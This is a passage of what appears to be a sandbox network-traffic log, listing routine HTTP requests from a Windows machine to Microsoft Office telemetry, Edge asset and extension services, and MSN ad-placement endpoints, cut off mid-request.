Source: global traffic	HTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1Host: api.edgeoffer.microsoft.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /crx/blobs/AW50ZFsLPhJJyx_4ShcDOgcEpJeOc7Vr0kMzfFRoaMfWx4pAgZ0UGF2i9_ei1A7FAHQ-EPFULeBn7F8_SEKhjbpEyKfiidX7GF_6BDOycMeg5w03wjwVQ61hkaEix8WFqmEAxlKa5cmz_tdFr9JtRwdqRu82wmLe2Ghe/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_84_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1733181937&P2=404&P3=2&P4=kBwAyNPu7pcbFkan0kTFxvseCBt%2b7%2bCSaJjJljLmGT89Uz5i2DoLvboBUaFvbr7TMWYC5dO7GeAMJYg1TpVAOQ%3d%3d HTTP/1.1Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.comConnection: keep-aliveMS-CV: XqWy/ZttXxA73YO1qDwIGISec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: EntityExtractionDomainsConfigSec-Mesh-Client-Edge-Version: 117.0.2045.55Sec-Mesh-Client-Edge-Channel: stableSec-Mesh-Client-OS: WindowsSec-Mesh-Client-OS-Version: 10.0.19045Sec-Mesh-Client-Arch: x86_64Sec-Mesh-Client-WebView: 0Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Shoreline HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: ShorelineSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=280815&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241125T232540Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=5215c2ca03244514bbfe7952d92f973f&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=601507&metered=false&nettype=ethernet&npid=sc-280815&oemName=jaryaj%2C%20Inc.&oemid=Public&ossku=Professional&scmid=Public&smBiosDm=jaryaj20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=601507&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=&svoffered=0 HTTP/1.1Accept-Encoding: gzip, deflateX-SDK-CACHE: chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6X-SDK-HW-TOKEN: t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AAeDShYGeY6BNP1ScXi6W2D+IcaU8wV9Tuj8PYSPb5rw3nRJxxG0T76NdL1T3kuTHMVyrszjczE1q5d0PyFwxq43mB3oxpmnV0Ws0i/S7kGicbfCaIt1Sqt6uttl7Yc9eO9HTL+jJI6cxYQXaUDYmlmP/zqTRhgJGmWM3BDkDrZiIhoDyqB0ujJO/aP5rLJPC8p8Ih4PowJv1qgT6pKBsdjMvyxxj0n+EB2kw9cX3e8Pvv3QmRL+Btst1elImxKxREWbySKYSJPeNXCFYLZNzyqdxhU82Uqqr00VNCbbPWk4LpDxHTm7tSSJzdPOzqr/N+pEJWjCocEabbsDIiCx4D5IQZgAAEHzRduvFiIz/rfE2nN5AXluwAQW39g4dOMHKfdu5m0rfYbcpms75Li4UtSWzIYVPEDhkLoZU6yfBKZkUgcrvkjEL3m1qNsrhvVeMlx1CP9vDg6j22VpQ0/uvtzk0D7cRko4yMqfL/XCLt0cCdsFInMqLc+RfVkO8+lyerZhDN6Zav5e2ThR5RUWXbArw6Kyk4AlcoJ4IAKli8GoYZQF9/kjW+7Ts2gcx4oDWo9KbCGfvxQp/cl1SVF123v1QRulee5/Kd6w4knzhQ2OLPdVqEUCHt5TQO2V+L1lz51Kicz/d+lxDhjiXK0BbQCOA8d0CRhWFyT7rSVuePy9B22re6wlPjMWifLNDPpo/CZn1TDpAg+MXRrfbXV1GhwnZ5XeGSTKWczZ3H8p9hb5CKcXrFwESUR59atbJrFSje3jtYUxCMXvpsQk9dTQIiB+qN+gQbbeykSiEa+r65Ebhum08v88TXCsZKjP1w+PdMl0Adgyd2wUa+9pcOXTE9sT+3Z8wCJ1feiDA5k1F4yRoZNoJF2v4DCMfKNqTvIotWhAmwPdmkIYXw1l2aDYfqHyGvesIiWkPz9LRtm7ZHEGnDWqXQT+UTNcB&p=Cache-Control: no-cacheMS-CV: y7MCjIAgcU2SEYAx.0User-Agent: WindowsShellClient/9.0.40929.0 (Windows)X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0Host: arc.msn.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=338388&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241125T232540Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=b27edecff88246e3b3e0af832e23a305&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=601507&metered=false&nettype=ethernet&npid=sc-338388&oemName=jaryaj%2C%20Inc.&oemid=Public&ossku=Professional&rver=2&scmid=Public&smBiosDm=jaryaj20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=601507&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=&svoffered=0 HTTP/1.1Accept-Encoding: gzip, deflateX-SDK-CACHE: chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6X-SDK-HW-TOKEN: t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AAeDShYGeY6BNP1ScXi6W2D+IcaU8wV9Tuj8PYSPb5rw3nRJxxG0T76NdL1T3kuTHMVyrszjczE1q5d0PyFwxq43mB3oxpmnV0Ws0i/S7kGicbfCaIt1Sqt6uttl7Yc9eO9HTL+jJI6cxYQXaUDYmlmP/zqTRhgJGmWM3BDkDrZiIhoDyqB0ujJO/aP5rLJPC8p8Ih4PowJv1qgT6pKBsdjMvyxxj0n+EB2kw9cX3e8Pvv3QmRL+Btst1elImxKxREWbySKYSJPeNXCFYLZNzyqdxhU82Uqqr00VNCbbPWk4LpDxHTm7tSSJzdPOzqr/N+pEJWjCocEabbsDIiCx4D5IQZgAAEHzRduvFiIz/rfE2nN5AXluwAQW39g4dOMHKfdu5m0rfYbcpms75Li4UtSWzIYVPEDhkLoZU6yfBKZkUgcrvkjEL3m1qNsrhvVeMlx1CP9vDg6j22VpQ0/uvtzk0D7cRko4yMqfL/XCLt0cCdsFInMqLc+RfVkO8+lyerZhDN6Zav5e2ThR5RUWXbArw6Kyk4AlcoJ4IAKli8GoYZQF9/kjW+7Ts2gcx4oDWo9KbCGfvxQp/cl1SVF123v1QRulee5/Kd6w4knzhQ2OLPdVqEUCHt5TQO2V+L1lz51Kicz/d+lxDhjiXK0BbQCOA8d0CRhWFyT7rSVuePy9B22re6wlPjMWifLNDPpo/CZn1TDpAg+MXRrfbXV1GhwnZ5XeGSTKWczZ3H8p9hb5CKcXrFwESUR59atbJrFSje3jtYUxCMXvpsQk9dTQIiB+qN+gQbbeykSiEa+r65Ebhum08v88TXCsZKjP1w+PdMl0Adgyd2wUa+9pcOXTE9sT+3Z8wCJ1feiDA5k1F4yRoZNoJF2v4DCMfKNqTvIotWhAmwPdmkIYXw1l2aDYfqHyGvesIiWkPz9LRtm7ZHEGnDWqXQT+UTNcB&p=Cache-Control: no-cacheMS-CV: y7MCjIAgcU2SEYAx.0User-Agent: WindowsShellClient/9.0.40929.0 (Windows)X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0Host: arc.msn.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=338387&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241125T232540Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=f16a4b4868cd460ebc3f443cd54eacb4&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=601507&metered=false&nettype=ethernet&npid=sc-338387&oemName=jaryaj%2C%20Inc.&oemid=Public&ossku=Professional&rver=2&sc-mode=0&scmid=Public&smBiosDm=jaryaj20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=601507&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=&svoffered=0 HTTP/1.1Accept-Encoding: gzip, deflateX-SDK-CACHE: chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6X-SDK-HW-TOKEN: t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AAeDShYGeY6BNP1ScXi6W2D+IcaU8wV9Tuj8PYSPb5rw3nRJxxG0T76NdL1T3kuTHMVyrszjczE1q5d0PyFwxq43mB3oxpmnV0Ws0i/S7kGicbfCaIt1Sqt6uttl7Yc9eO9HTL+jJI6cxYQXaUDYmlmP/zqTRhgJGmWM3BDkDrZiIhoDyqB0ujJO/aP5rLJPC8p8Ih4PowJv1qgT6pKBsdjMvyxxj0n+EB2kw9cX3e8Pvv3QmRL+Btst1elImxKxREWbySKYSJPeNXCFYLZNzyqdxhU82Uqqr00VNCbbPWk4LpDxHTm7tSSJzdPOzqr/N+pEJWjCocEabbsDIiCx4D5IQZgAAEHzRduvFiIz/rfE2nN5AXluwAQW39g4dOMHKfdu5m0rfYbcpms75Li4UtSWzIYVPEDhkLoZU6yfBKZkUgcrvkjEL3m1qNsrhvVeMlx1CP9vDg6j22VpQ0/uvtzk0D7cRko4yMqfL/XCLt0cCdsFInMqLc+RfVkO8+lyerZhDN6Zav5e2ThR5RUWXbArw6Kyk4AlcoJ4IAKli8GoYZQF9/kjW+7Ts2gcx4oDWo9KbCGfvxQp/cl1SVF123v1QRulee5/Kd6w4knzhQ2OLPdVqEUCHt5TQO2V+L1lz51Kicz/d+lxDhjiXK0BbQCOA8d0CRhWFyT7rSVuePy9B22re6wlPjMWifLNDPpo/CZn1TDpAg+MXRrfbXV1GhwnZ5XeGSTKWczZ3H8p9hb5CKcXrFwESUR59atbJrFSje3jtYUxCMXvpsQk9dTQIiB+qN+gQbbeykSiEa+r65Ebhum08v88TXCsZKjP1w+PdMl0Adgyd2wUa+9pcOXTE9sT+3Z8wCJ1feiDA5k1F4yRoZNoJF2v4DCMfKNqTvIotWhAmwPdmkIYXw1l2aDYfqHyGvesIiWkPz9LRtm7ZHEGnDWqXQT+UTNcB&p=Cache-Control: no-cacheMS-CV: y7MCjIAgcU2SEYAx.0User-Agent: WindowsShellClient/9.0.40929.0 (Windows)X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0Host: arc.msn.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_M365_light.png/1.7.32/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=280815&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241125T232545Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=f05fe721de104a9a9ec2b60777f43cee&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=601507&metered=false&nettype=ethernet&npid=sc-280815&oemName=jaryaj%2C%20Inc.&oemid=Public&ossku=Professional&scmid=Public&smBiosDm=jaryaj20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=601507&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=&svoffered=0 HTTP/1.1Accept-Encoding: gzip, deflateX-SDK-CACHE: cid=128000000001627409&chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6X-SDK-HW-TOKEN: 